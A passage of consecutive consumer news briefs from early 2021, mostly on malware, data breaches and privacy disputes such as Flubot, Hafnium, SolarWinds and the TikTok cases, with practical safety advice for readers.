Apollo was happy to take Yahoo off Verizon’s hands, especially for the advertising revenue it brings. When the COVID-19 forced people indoors and online, Yahoo experienced quite a leap in shopping and services. Yahoo Mail-based commerce grew seven times what it was in 2019 and the company’s overall revenue jumped 187%, led by triple digit spurts by Yahoo Finance Premium and Extra Crunch Premium, its weekly event series connecting company founders with tech leaders. 

The Yahoo News niche is also of particular value to Apollo as it continues to evolve -- especially with Generation Z. Recently, it claimed the slot of the fastest growing news organization on TikTok. 

“We are big believers in the growth prospects of Yahoo and the macro tailwinds driving growth in digital media, advertising technology and consumer internet platforms,” said David Sambur, Senior Partner and Co-Head of Private Equity at Apollo. “Apollo has a long track record of investing in technology and media companies and we look forward to drawing on that experience to help Yahoo continue to thrive.” 

A new strain of password-stealing Android malware is infecting consumers’ devices around the world. Mobile network operators and security researchers worldwide have sent up a flare about a text message scam infecting users with Flubot, a malicious piece of spyware. 

Flubot is able to spy on consumers and access contact details once it infiltrates a user’s phone system. It can even go on a text message spree that will send out more malicious messages to further spread the spyware.

How Flubot works

The way Flubot appears on a user’s phone is pretty innocuous -- a text message simply pops up claiming to be from a delivery company. Within that message, users are prompted to click on a link to track their supposed package. However, once that link is clicked, Flubot takes over and installs more phishing malware on the device.

Britain’s National Security Cyber Centre reports that the malicious messages have claimed to be from DHL so far, but researchers warn that other delivery companies can easily be cited for the purposes of the scheme. The organization also reports that Apple device users are not currently at risk, but it’s possible the scam text messages might still redirect them to a website that may steal their personal information.

Protecting yourself against Flubot

Dealing with malware is a hassle that nobody wants, so it’s important that everyone is aware of what to look out for when it comes to these scams. If you receive a text message from a company that you don’t normally do business with or someone you don’t frequently get text messages from, that should immediately raise red flags.  

If you receive one of these suspicious messages, this is what you should do:

1. Do not click the link in the message, and do not install any apps if prompted.

2. Forward the message to 7726 (SPAM), a free spam reporting service endorsed by the Federal Trade Commission (FTC) and offered by telephone companies.

3. Delete the message.

4. In situations in which you were actually expecting a DHL delivery, it’s recommended that you visit the official DHL website to track your delivery. Make sure that you do not use the link in the scam text message.

All is not lost if you have already clicked the link to download the application, but you are going to have to do a system reset and wipe your device clean. One important thing: Do not enter your phone’s password or log into any accounts until you have done all the steps.

1. Perform a factory reset. The process for a reset on an Apple device is here; for Android devices, follow the steps posted here. Sadly, you will lose the data on your phone if you don’t have a backup installed for your device.

2. Once you set up the device after the reset, you might be asked if you want to restore it from a backup. Make sure that you are not restoring to a version of your phone that came after you downloaded the malicious app because that backup will also be infected.

Two final suggestions: take preventive measures if you haven’t been hit by Flubot. Back up your device and only install apps from your device’s “official” app store like Apple’s App Store and Google’s Play Store. An additional suggestion for Android users is to make sure Google’s Play Protect is enabled on your device. Every additional layer of protection is worth the effort when fighting against malware and spyware.

You should also investigate steps the FTC suggests as possible ways to protect your phone from malware and spyware. Those suggestions are available here.

Geico suffered a data breach earlier this year that led to customers’ driver’s license numbers being exposed for more than a month. 

In a data breach notice, the motor vehicle insurer said it fixed the security issue immediately after becoming aware of it. However, there’s still some risk that fraudsters could apply for unemployment benefits using the stolen data.

“We recently determined that between January 21, 2021 and March 1, 2021, fraudsters used information about you – which they acquired elsewhere – to obtain unauthorized access to your driver’s license number through the online sales system on our website,” the company wrote in the breach notice. “We have reason to believe that this information could be used to fraudulently apply for unemployment benefits in your name.”

Security enhancements 

Geico said the hackers behind the breach used personal information about Geico customers that they pilfered from other places in order to gain access to Geico’s sales system and steal the driver’s license numbers. 

“As soon as GEICO became aware of the issue, we secured the affected website and worked to identify the root cause of the incident. While we regularly maintain high security and privacy standards, we have also implemented—and continue to implement—additional security enhancements to help prevent future fraud and illegal activities on our website,” the notice said.

The company said it isn’t sure how many customers were affected by the breach or if the scope of the incident extends beyond California. Customers with security concerns can get a one-year subscription to IdentityForce -- an identity-theft protection service. The insurance company is also encouraging its customers to vigilantly look at account statements and credit reports to ensure that there is no unauthorized activity. 

“If you receive any mailings from your state’s unemployment agency/department, please review them carefully and contact that agency/department if there is any chance fraud is being committed,” Sheila King, a manager for data privacy at Geico, wrote in the breach notice. 

In an effort to mitigate the threat of the Hafnium hack, the FBI has been cleared to use the hackers’ own tools to remotely delete infections on people’s computers. 

Last month, security researchers began sounding the alarm about a hack being carried out by a Chinese espionage group known as “Hafnium.” The hack involved the exploitation of multiple zero-day vulnerabilities, and it affected tens of thousands of Microsoft Exchange Servers around the world. 

While Microsoft did eventually address the issue in the form of detection tools and patches, the threat of the hack has lingered. Now, the Justice Department has disclosed that a Texas court granted the FBI approval to utilize a number of remaining backdoors to remotely delete Hafnium infections. 

“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.

Operation successful

The Department said the operation was successful, but further action will be required to fully patch the vulnerabilities. 

“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” the U.S. Justice Department stated. 

Under the operation, experts “did not patch any Microsoft Exchange Server zero-day vulnerabilities or search for or remove any additional malware or hacking tools that hacking groups may have placed on victim networks by exploiting the web shells.” 

The Justice Department said it “strongly encourages network defenders to review Microsoft’s remediation guidance and the March 10 Joint Advisory for further guidance on detection and patching.” 

It seems like only yesterday that 533 million Facebook accounts were compromised by malicious actors. But the hacking world never sleeps, and personal information from hundreds of millions of LinkedIn accounts is now reportedly being offered on an online forum.

Cyber News reports that an archive of 500 million LinkedIn profiles was posted to a hacking forum, with the cyber thieves disclosing details of 2 million accounts to prove they have the goods. The leaked details were supposedly scraped from the site and include users’ full names, email addresses, phone numbers, workplace information, and other data.

For its part, LinkedIn says this incident was not technically a “LinkedIn data breach” because the information was “actually an aggregation of data from a number of websites and companies.” This likely means that the data collected by the hacker was information that was already viewable on the site. LinkedIn says it believes no private member account information was included.

How does this affect consumers?

There are a few different ways the information in this breach could be used for nefarious purposes. First, and perhaps most directly, any entity that buys the data from the hacking source could send spam messages to the email addresses and spam calls to phone numbers. 

While this might be annoying enough on its own, the collected data could also be used for phishing attacks. These scam attempts would be especially dangerous because consumers’ personal information could be used to make them more believable. Cyber News notes that hackers could also combine the information they collected from this leak with information from other data breaches to compromise accounts. 

Consumers should consider implementing several standard cybersecurity practices to protect themselves and their online accounts. This includes resetting email and account passwords, reviewing what information they’re making available on social media and other websites, and enabling two-factor authentication on all online accounts. 

You can learn more about how to protect your online information by reading ConsumerAffairs’ guide on how to prevent identity theft.

A hack of 533,000,000 global Facebook users that went up for sale on messaging app Telegram in January has now spiraled out of control. 

Over the weekend, security researcher Alon Gal tweeted out that every single one of those half-billion Facebook records were just leaked for free. “This means that if you have a Facebook account, it is extremely likely the phone number used for the account was leaked,” Gal wrote.

Telephone numbers were just the top layer of what was stolen. Gal detailed that a person’s Facebook ID, full name, location, past location, birthdate, email address, account creation date, relationship status, and bio were also possibly purloined. Users from 106 countries are affected, including 32 million people in the U.S.

“Bad actors will certainly use the information for social engineering, scamming, hacking and marketing,” Gal said.

As of mid-morning on Monday, neither Facebook CEO Mark Zuckerberg, Facebook Security, or Facebook’s Privacy blog had acknowledged the issue. 

Brace yourself for more

When ConsumerAffairs reached out for comment from Daniel Markuson, a digital privacy expert at NordVPN, he said that people should buckle up for a large wave of personalized phishing or social engineering attacks. In a hacker’s way of thinking, why not? There’s no monetary risk since the personal data was free. “It means that anyone with shady intentions was able to get their hands on it,” Markuson said.

“This leak raises huge concerns, especially now. Cybercriminals exploit fears or feed on the need for urgency. We have already seen a surge in pandemic-related cybercrimes, and this trend continues. Now, as countries all over the world are starting to roll out vaccination programs, there is another opportunity for cybercriminals.”

Markuson said that vaccine-related searches in the U.S. have grown by 1,900 percent since January. This shows that Americans are becoming increasingly anxious to get their COVID-19 vaccine and might be an easy target for hackers. 

Protecting yourself

Protecting yourself against a phishing email or malicious message isn’t complicated, but it does take some vigilance. When ConsumerAffairs asked Markuson what advice he would give to unsuspecting people, he gave us six things to watch out for.

• Check the sender’s email address or telephone number. Don’t just trust the display name – pay attention to the email address, telephone number, and other sender credentials,” he said.

• Look for spelling mistakes, grammar mistakes, and design issues. Serious companies and institutions don’t usually send out emails with bad grammar; email design is usually lean and precise.

• Don’t click on links or download attachments. If that’s an email - hover your mouse over the link to see the destination link. Check if it looks legitimate and, especially, if it contains the “https” part to indicate a secure connection. For other types of messages, it’s generally safer to search for the website yourself.

• Consider context. Were you expecting such an email or message? If not, it is probably suspicious, especially if the offer seems too good to be true.  

• Contact the company yourself. When in doubt, contact the company or institution over the phone or by using an alternative email address to confirm if the email is legitimate.

• Report the incident to the authorities. If you notice something unusual, raising the alarm can help not only you, but others affected by the leak as well.

“Everyone can become a victim of phishing scams,” Markuson said. “Although some of them are pretty obvious, others can be challenging to spot. As a prevention measure, use cyber security software such as VPNs, antiviruses, spam filters, and firewalls.”

ConsumerAffairs has a guide on data protection. It covers rates, reviews, and other information about companies that offer data protection services. It’s available here.

It should be noted that Facebook Security extended support for mobile security keys for Facebook iOS/ Android users on March 18. The team suggested that users employ security keys to help ensure that passwords aren’t the last line of defense between an attacker and a user’s account.

On Thursday, Stanford University announced that it’s looking into the alleged theft of personal data from those in the School of Medicine community. 

Hackers reportedly gained access to information in a 20-year-old file transfer system used by the school. The cybercriminals stole data including Social Security numbers, addresses, emails, family members and financial information. 

“Stanford University School of Medicine has learned that cybercriminals have claimed they have stolen some School of Medicine data,” the university said. “We are investigating this incident and we have reported the incident to law enforcement.” 

At this time, school officials aren’t sure how many people were affected by the breach. The incident has been reported to law enforcement.

“We are working to determine whether individuals’ personal data has been affected, and we will notify any affected individual,” the university said. “We take data protection very seriously, and as a best practice, we recommend that all individuals remain vigilant and promptly report any suspicious activity or suspected identity theft to the Stanford School of Medicine.”

Part of a larger attack

Stanford said the hack was part of a larger national cyberattack on universities and organizations that use a widely used file transfer service called Accellion. 

Other victims of the attack include the University of Colorado, Washington State’s auditor, Australia’s financial regulator, the Reserve Bank of New Zealand and U.S. law firm Jones Day. Some institutions received ransom demands from the hackers. The bad actors threatened to leak more information unless they received money. 

“This is a 20 year old legacy system. And these are notoriously insecure,” said Jack Cable of the Stanford Daily. “This is something that’s endemic across probably all universities and large companies, in that they’re dependent on software that is really old and is likely pretty vulnerable. That’s why we’re seeing so many breaches.”

Users of Apple iOS devices welcomed the week with a security threat. Now, Android users are being warned of malware posing as a security update that can allow hackers to take complete control of devices. 

The sophisticated new malicious app disguises itself as a System Update application, according to mobile security company Zimperium (zLabs). Once it takes control of an Android device, it’s able to steal data, images, and messages. Once they infiltrate a device, hackers can also record audio and phone calls, take photos, monitor GPS locations, steal phone contacts, take instant messenger database files, review browser history, access WhatsApp messages, and more. 

Worse yet, it can do its damage undetected by hiding the icon from the device’s drawer/menu.

Stay away from third-party software sites

zLabs confirmed with Google that the app is not -- and has never been -- on Google Play. However, users who download system software from unsecured, third-party platforms can be targeted and become victims if they’re not careful.

Before clicking on “accept” for any app update or before installing a new app on your Android device, users should ask themselves where exactly that software is coming from. You’re probably safe if it’s from the Google Play store, but stay away from installing any software that was sent via text message unless it is from a trusted source you know and have installed software from before. 

One telltale sign of this scheme is any Android update that is offered in the form of a new, self-contained app. Android updates do not come packaged like that. 

Apple users who have been on pins and needles about a critical security breach can rest easy. On Friday, the company released a new update for its iOS software system that fixed the issue.

Specifically, the new update impacts Webkit, a browser engine developed by Apple and used primarily in its Safari web browser on various Apple devices. The original problem reported to Apple suggested that Webkit contained a vulnerability that would allow “maliciously crafted web content” to create “universal cross site scripting.” The company said it was aware that the threat may have been actively exploited.

Apple has its peer Google to thank for finding the threat. The issue was first detailed by members of Google’s Threat Analysis Group.

Who should be concerned and what should be done

Apple reaffirmed the importance of iOS users updating their software, saying the update “provides important security updates and is recommended for all users.”

Consumers who own at least one of the following Apple products should update their system software as soon as possible:

• iPhone: iPhone 6s and later

• iPad: iPad Pro (all models); iPad Air 2 and later; iPad 5th generation and later; iPad mini 4 and later

• iPod Touch (7th generation)

The iOS and iPadOS 14.4.2 updates are free and can be downloaded on all of the aforementioned devices via the Settings app. To access the software update, go to Settings > General > Software Update.

Microsoft has released a “one-click” tool that enables smaller companies to patch the critical “Hafnium” vulnerability disclosed by the company earlier this month. 

Security researchers warned last week that four bugs in the Microsoft Exchange email and calendar servers were at risk of being used in attacks by the Chinese espionage group Hafnium. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) said it was "aware of widespread domestic and international exploitation" of the bugs. 

Microsoft recently released a patch for the flaw (CEV-2021-26855), but it was primarily designed for large organizations with dedicated IT or security teams capable of executing the complex fix. Now, the tech giant has released an easier-to-install tool for smaller firms without such teams. 

“....we realized that there was a need for a simple, easy to use, automated solution that would meet the needs of customers using both current and out-of-support versions of on-premises Exchange Server,” Microsoft said. 

Mitigating the flaw

The tech giant said the tool will guard against attacks that have been seen so far, but it won’t prevent future attacks and isn’t a replacement for the other Exchange patches. However, the company said it is “the fastest and easiest way to mitigate the highest risks to internet-connected, on-premises Exchange servers prior to patching.” 

“This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update,” Microsoft said in a blog post. “By downloading and running this tool, which includes the latest Microsoft Safety Scanner, customers will automatically mitigate CVE-2021-26855 on any Exchange server on which it is deployed.”

The company’s “one-click” mitigation tool can be accessed here. 

Security researchers are warning that four zero-day vulnerabilities in Microsoft Exchange are now being used in attacks against thousands of organizations. 

Microsoft said Exchange customers should apply the emergency patches that it recently released as soon as possible because "nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems."

Over the weekend, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) said it was "aware of widespread domestic and international exploitation" of the vulnerabilities. 

Easy to exploit bugs 

The bugs -- which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 -- are being used in attacks by a Chinese espionage group known as “Hafnium,” researchers said. The group was found to have deployed “web shells” on compromised Microsoft Exchange Servers with the aim of stealing data and installing malware. 

“Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs,” Microsoft said. “HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

Chris Krebs, the former director of CISA, believes state and local government agencies and small businesses will be more widely affected by the attacks than large enterprises. 

"Incident response teams are BURNED OUT & this is at a really bad time," Krebs wrote. 

Around 30,000 organizations in the U.S. have been affected by the attacks, according to Brian Krebs of KrebsOnSecurity.com. 

"The intruders have left behind a ‘web shell,’ an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser. The web shell gives the attackers administrative access to the victim's computer servers," Krebs said. 

Sens. Amy Klobuchar (D-MN) and Lisa Murkowski (R-AK) are calling on the Federal Trade Commission (FTC) to combat stalkers’ exploitation of people search websites. 

In a letter to the agency, the senators said there’s a clear need for action to protect people who have been, or may become, victims of abuse and stalking as a direct result of information gleaned through people search sites. 

“We write to express serious concerns about recent reports that data brokers are publicizing the location and contact information of victims of domestic violence, sexual violence, and stalking,” the senators wrote. “We have serious concerns that third-party data brokers play a role in revealing [a] protected address and providing access to personal information that can lead to continued abuse.”

The senators suggested the possibility of introducing measures to help people remove their addresses from data brokers like WhitePages and Spokeo, which market themselves as tools akin to digital phone books. The sites offer phone numbers, email addresses, physical addresses, and more. 

Easily accessible information

Getting information taken down from sites like these (of which there are dozens) can be time consuming and often require the submission of personal data via physical letters or even faxes. The fact that people search sites automatically scrape personal data complicates matters further. 

"One in four women and one in nine men experience intimate partner violence," the senators wrote in the letter, adding that victims “often are forced to relocate to a relative’s house to find safety.” 

“The availability of this data makes it difficult or impossible for victims to safely relocate with relatives,” they added. 

Klobuchar and Murkowski want the FTC to come up with a plan to work with other agencies to keep violent abuse perpetrators from accessing personal information. They also want to help educate victims about data broker services and offer resources on what to do if their information falls into the wrong hands. 

The senators also asked if the FTC has plans to prevent brokers from “collecting, buying, or selling lists of vulnerable populations.”

If you feel like internet ads follow you everywhere you go, there may be some good news on the horizon. In a monumental shift, Google is giving tracking technologies the boot, announcing that it plans to stop selling ads based on individuals’ browsing across multiple websites.

It’s undetermined exactly how much cutting that slice out of Google’s ad business will set the company back, but it could be plenty. According to Statista, Google's total ad revenue in 2020 amounted to $146.92 billion spread across its extensive ad network. Nonetheless, the important pro-consumer point here is that Google seems to be more concerned with what it calls an “erosion of trust” from people who venture out online. 

“As our industry has strived to deliver relevant ads to consumers across the web, it has created a proliferation of individual user data across thousands of companies, typically gathered through third-party cookies,” explained David Temkin, Google’s Director of Product Management, Ads Privacy and Trust.

”This has led to an erosion of trust: In fact, 72 percent of people feel that almost all of what they do online is being tracked by advertisers, technology firms or other companies, and 81 percent say that the potential risks they face because of data collection outweigh the benefits, according to a study by Pew Research Center. If digital advertising doesn't evolve to address the growing concerns people have about their privacy and how their personal identity is being used, we risk the future of the free and open web.”

What changes to expect

This change won’t happen overnight, but there is already forward progress. As a precursor to this move, the company announced in late January that it was going to phase out third-party tracking cookies in its Chrome browser. Once third-party cookies are completely phased out, Temkin vowed that Google will not build alternate identifiers to track individuals as they browse across the web, nor will the company use them in its products.

In its cookieless future, Google wants everything relating to advertising -- targeting, measurement, and fraud prevention -- to be in line with the standards set by its own Privacy Sandbox. If all goes according to plan, cookies will be replaced by application programming interfaces (API) that advertisers will use to gather five unique pieces of data, including how well an ad performed and what platform actually leveraged a purchase out of an ad on its site(s). 

“The most significant item in the Privacy Sandbox is Google’s proposal to move all user data into the browser where it will be stored and processed,” Amit Kotecha, marketing director at data management platform provider Permutive, told Digiday. “This means that data stays on the user’s device and is privacy compliant. This is now table stakes and the gold standard for privacy.”

Google seems to be one of the few companies going in on this new privacy venture; there’s still dozens of digital ad networks that are mum on the subject -- at least for now.

“We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not — like [personally identifiable information] based on people’s email addresses,” Temkin said. 

“We don’t believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions, and therefore aren’t a sustainable long term investment. Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers.”

Europe’s leading consumer advocacy group -- the Bureau Européen des Unions de Consommateurshas (BEUC) -- has filed a complaint against TikTok over claims that the Chinese-owned app violated the bloc’s data privacy laws. 

The BEUC has accused TikTok of violating General Data Protection Regulation (GDPR) through its alleged “unclear” terms of service and by "failing to protect children and teenagers from hidden advertising and inappropriate content."

The complaint was filed in the wake of several reports that analyzed the video-sharing app’s approach to consumer protection through its data protection practices and privacy procedures. 

Hidden advertising

In a press release, the BEUC accused TikTok of allowing companies to peddle their products in a way that young users might not see as advertising. 

“Users are for instance triggered to participate in branded hashtag challenges where they are encouraged to create content of specific products,” the BEUC wrote. “As popular influencers are often the starting point of such challenges the commercial intent is usually masked for users. TikTok is also potentially failing to conduct due diligence when it comes to protecting children from inappropriate content such as videos showing suggestive content which are just a few scrolls away.” 

The group also argues that the app isn’t doing enough to prevent underage users from registering for an account. 

“In practice, it is very easy for underage users to register on the platform as the age verification process is very loose and only self-declaratory,” the BEUC said, citing a number of studies that have suggested that children make up “a very big part” of the app’s user base. 

Data collection concerns

With regard to data collection, the BEUC accused the Chinese-owned app of repeatedly changing its data and protection practices in Europe without publicly disclosing that it had done so. The group claims TikTok has an “ambiguous” privacy policy that doesn’t give users a clear picture of the ways in which it collects and uses personal information. 

The BEUC noted that TikTok’s terms and conditions grant it an “irrevocable right to use, distribute and reproduce the videos published by users, without remuneration.” Also problematic to the group is the app’s lack of an opt-out feature that users can select if they would prefer not to have their personal data collected for advertising. 

Consumer organizations in 15 countries are now pushing for authorities to investigate TikTok.

TikTok said in a statement to Reuters that it's "always open to hearing how we can improve” and that it has contacted BEUC about potentially scheduling a meeting “to listen to their concerns.” The company also said it provides an in-app summary of its privacy that it claims was crafted to be easy for teens to understand.

Slack developers have sent emails to some Android users saying they erroneously logged the passwords of Android users in plain text for a period of time. Emails have been sent to affected users containing a link to perform a password reset. Android Police noted that the email might look like a phishing attempt to some people, but it’s legitimate. 

“It's safe to click, or you can navigate to Slack's site directly yourself, sign in there, and reset your password manually,” the site reported. 

Slack said the logging “bug” took effect on December 21, 2020, but it apparently wasn’t caught and fixed until January 21, 2021. Over the course of those 31 days, Slack for Android may have logged users’ passwords in an unencrypted format.

Slack said the issue only impacted a small subset of Android users. However, anyone who uses Slack for Android on a regular basis may want to change their password even if they didn’t receive an email saying they should do so. 

Wiping logs

In addition to choosing a new “complex and unique password,” affected users are also advised to clear the storage of Slack for Android so that any potentially password-containing logs are wiped from the device. 

Slack assured users that it has rolled out “a fixed version” of the Android app. Additionally, it has “blocked usage of the impacted version(s).” 

“We very much regret any inconvenience we have caused,” Slack said in the email. 

TikTok’s forced sale to Oracle and Walmart has been put on hold “indefinitely” now that the Biden administration has taken the reins, according to The Wall Street Journal. 

Last year, Trump ordered the sale of TikTok to a majority U.S.-ownership group over concerns about data security, as well as the potential for the video sharing app’s algorithm to be used to advance Chinese political goals. 

After being pushed back several times, the deadline for the sale was ultimately moved to December 4. That date came and went with no response from the outgoing administration. Now, Biden administration officials say the deal is on hold while the new president reviews past efforts to mitigate security risks from Chinese technology firms. 

“We plan to develop a comprehensive approach to securing U.S. data that addresses the full range of threats we face,” National Security Council spokeswoman Emily Horne told the Journal. “This includes the risk posed by Chinese apps and other software that operate in the U.S. In the coming months, we expect to review specific cases in light of a comprehensive understanding of the risks we face.”

TikTok may use a third party for data

TikTok is reportedly still talking to the Committee on Foreign Investment in the U.S. (CFIUS) about resolving security concerns. However, sources familiar with the matter told the Journal that any deal reached “would likely be different from the one discussed last September.” 

Instead of a sale, a source said that one resolution might involve sending TikTok data to a “trusted third party” to prevent the Chinese government from having access to Americans’ info. The newly installed administration has until February 18 to offer a formal response to TikTok’s legal situation. 

Chinese telecommunications manufacturer Huawei has asked a court to overturn the Federal Communications Commission’s (FCC) late 2020 classification of it as a national security threat.

Huawei has a tainted reputation on Capitol Hill, starting when it came under scrutiny for allegedly implanting malicious hardware or software into its components and systems. The company maintains that the FCC overstepped the boundaries of its authority in issuing the new designation. 

“The order on review potentially impacts the financial interests of the telecommunications industry as a whole,” Huawei’s request said. By “whole,” the company is referring to network operators the FCC locked out of buying Huawei-made parts. 

The latest skirmish is not Huawei’s first with the FCC. In 2019, the agency voted to cut off any federal funds used to buy Huawei products. That move grew into a bill that officially prevented U.S. companies from rolling out wireless networks with Huawei’s equipment -- or that of its Chinese peer, ZTE. Huawei also tried to reverse that decision but came up empty. 

The FCC added even more misery for the telecom maker in December 2020 by voting to make companies replace existing Huawei equipment.

Biden’s FCC backs up Trump’s FCC

The Trump administration was not exactly Chinese commerce’s best friend. From attempts to ban popular China-based phone apps like TikTok and WeChat to a slugfest over trade issues, Trump took it to China with both fists. 

If China was hoping for a respite from the Biden administration, the FCC’s move is the first to dash those hopes. To date, President Biden has not made a move to keep the war on TikTok alive, but his administration is supporting what the Trump administration’s FCC did in its Huawei decree. 

“Last year the FCC issued a final designation identifying Huawei as a national security threat based on a substantial body of evidence developed by the FCC and numerous U.S. national security agencies. We will continue to defend that decision,” a spokesperson told The Verge.

Google has blocked a popular Chrome extension called “The Great Suspender” because it was found to contain malware. 

On Thursday, Chrome users with the extension installed started seeing a message that read: “[The Great Suspender] has been disabled because it contains malware.” Google has also pulled the extension from its Chrome Web Store. 

The Great Suspender was previously a helpful tool that would automatically force any tabs that users hadn’t looked at in a while to go to “sleep,” which helped conserve memory and keep the browser moving quickly. 

Now that the extension is gone, Reddit users have found a way to get tabs back, however the process is somewhat tedious. There are also a few extensions that work similarly to The Great Suspender, including Session Buddy and OneTab. Users can also keep their browser running quickly by simply limiting the number of tabs that are open.

By hook or crook, foreign actors continue to try to worm their way into U.S. companies and internet platforms. 

On Tuesday, CNBC reported that Google has uncovered a new twist in the cyber spy game, courtesy of North Korean state hackers who are trying yet another hacking angle. This time, it appears they’re targeting security researchers directly on social media.

Google’s Threat Analysis Group (TAG) uncovered a campaign in which bad actors worked a confidence ploy to create credibility with security researchers by building out a research blog. The fraudsters also created multiple Twitter profiles and personas on LinkedIn, Telegram, Discord, Keybase, and via email so they could interact with potential targets. A brassy bunch, the actors even used their new Twitter profiles for posting links to their blog and posting videos of their claimed exploits.

Anyone concerned should pay attention to the details

To date, Google’s threat analysts say they’ve only seen these actors targeting Windows systems as a part of this campaign and that even computers running "fully patched and up-to-date Windows 10 and Chrome browser versions" still got infected.

Nonetheless, a red flag has been raised, and Google recommends that potential targets compartmentalize their research activities by “using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.”

To help identify the sites, blogs, and accounts to stay away from, TAG has published a full list of actor controlled sites and accounts. It’s available here.

Google remains vigilant about security issues. To help circle the wagons against digital insurrections, the company offers rewards of up to $150,000 for anyone who can lead them to Chrome-related vulnerabilities like the ones leveraged in this situation.

Cybersecurity firm Malwarebytes has disclosed that it was targeted by the same group of hackers behind the breach of IT software company SolarWinds. 

The firm said it doesn’t use SolarWinds’ IT software, through which hackers were able to break into the systems of companies including FireEye, Microsoft, and CrowdStrike. Instead, Malwarebytes said it was infiltrated using another intrusion vector. 

The bad actors were able to breach the firm’s internal systems by exploiting a dormant email protection product within its Office 365 tenant, the company said. 

“We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments,” wrote Marcin Kleczynski, Malwarebytes co-founder and current CEO. 

Malwarebytes products ‘remain safe to use’

Malwarebytes said it found out about the intrusion on December 15, after the Microsoft Security Response center detected suspicious activity in the dormant Office 365 app. The activity was “consistent with the tactics, techniques and procedures” deployed by the hackers who carried out the SolarWinds attacks.

After learning of the breach, the company said it quickly launched an internal investigation to determine what hackers were able to gain access to. Malwarebytes said its anti-malware users can be assured that its software remains safe to use since it doesn’t use Microsoft’s Azure cloud services.

“After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails,”  Kleczynski said. “We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.” 

Malwarebytes’ announcement that it was targeted by the SolarWinds attackers brings the total number of affected security vendors to four. The group of threat actors previously targeted FireEye, Microsoft, and CrowdStrike in what is believed to have been an attempt to gather intelligence. 

Officials from the FBI, NSA, and Cybersecurity and Infrastructure Security Agency (CISA) recently put out a joint statement naming the Russian government as the most likely culprit behind the cyber-espionage attacks. 

Investigators said Monday that the hackers behind the global SolarWinds incident used computer code with links to known Russian spying tools, Reuters reports. 

It recently came to light that cyber criminals hacked SolarWinds to gain access to at least 18,000 government and private networks. It is believed that the cyberattackers’ goal was to collect intelligence. 

Now, researchers at Moscow-based cybersecurity company Kaspersky said the attackers deployed code that closely resembled malware associated with a Russian hacking group known as “Turla.” 

The way in which the SolarWinds hack was carried out had three notable similarities to a hacking tool called “Kazuar,” which is used by Turla, according to Costin Raiu, head of global research and analysis at Kaspersky.

Similarities were noted in how the hackers identified their victims and how they avoided being detected through the use of a specific formula to calculate periods with the viruses lying dormant. Additionally, both pieces of malware attempted to obscure their functions from security analysts.  

“One such finding could be dismissed,” Raiu said. “Two things definitely make me raise an eyebrow. Three is more than a coincidence.”

Connection likely

Raiu said the similarities point to the likelihood of a link between the two hacking tools, but they don’t necessarily imply that Turla played a role in the SolarWinds hack. He said there’s a possibility that the hackers behind the SolarWinds hack were merely inspired by Kazuar, or that they deliberately planted “false flags” in order to throw off investigators. 

Although Moscow has denied involvement in the hack, U.S. intelligence agencies have said that the hackers were “likely Russian in origin.” Security firms in the U.S. and other countries are continuing to investigate the incident in order to determine its full scope, and the Department of Justice has vowed to take serious action. 

“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination,” the agency said last week. “The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted."

After sitting on the news for almost two weeks, the U.S. Department of Justice (DOJ) has confirmed that its email systems fell prey to the same band of cyberattackers linked to the global SolarWinds incident that has affected government and private sector businesses.

"On Dec. 24, 2020, the Department of Justice’s Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others. This activity involved access to the Department’s Microsoft O365 email environment,” DOJ spokesman Marc Raimondi said in a statement.

Raimondi went on to say that the number of affected email boxes was limited to around 3 percent and that the agency has no indication that any of its classified systems were impacted.

“A major incident”

According to a joint statement issued by the recently organized Cyber Unified Coordination Group -- which includes the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence, and the National Security Agency -- the hackers are “likely Russian in origin” and “responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks.”

The group’s investigation is ongoing, and it’s possible they could turn up additional government victims. In the group’s estimation, the hackers’ goal appeared to be collecting intelligence, rather than anything destructive.

Nonetheless, the attack on the DOJ was serious enough that it’s vowing to take serious action.

“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination,” the agency said. “The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted."

President Trump has signed an executive order banning several Chinese payment apps, including Alipay and WeChat Pay. 

A senior administration official said the order, which was signed late in the day on Tuesday, aims to keep American user data from being shared with the Chinese government. The Trump administration cited the possibility that the apps mentioned in the order could be used as a “mass tool for global oppression.”

"The United States must take aggressive action against those who develop or control Chinese connected software applications to protect our national security," the order said.

In total, eight Chinese apps are banned under the order: Tencent QQ, CamScanner, SHAREit, VMate, WPS Office, QQ Wallet, Alipay, and WeChat Pay. 

National security concerns

The U.S. government has concluded that the apps named in the order automatically capture “sensitive personally identifiable... and private information” from millions of users in the United States.” President Trump is concerned that the apps could be used to track and build dossiers of personal information on federal employees.

